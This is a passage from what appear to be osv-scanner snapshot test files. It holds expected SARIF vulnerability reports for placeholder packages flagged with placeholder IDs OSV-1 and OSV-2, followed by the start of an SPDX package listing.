[OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | abc123 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | abc123 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@abc123' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | abc123 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | abc123 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine3@0.10.2-rc' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!", "text": "This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1", "text": "OSV-1" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine3 | 0.10.2-rc |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine3 | 0.10.2-rc |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2", "text": "OSV-2" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- ================================================ FILE: internal/output/__snapshots__/spdx_test.snap ================================================ [TestPrintSPDXResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, 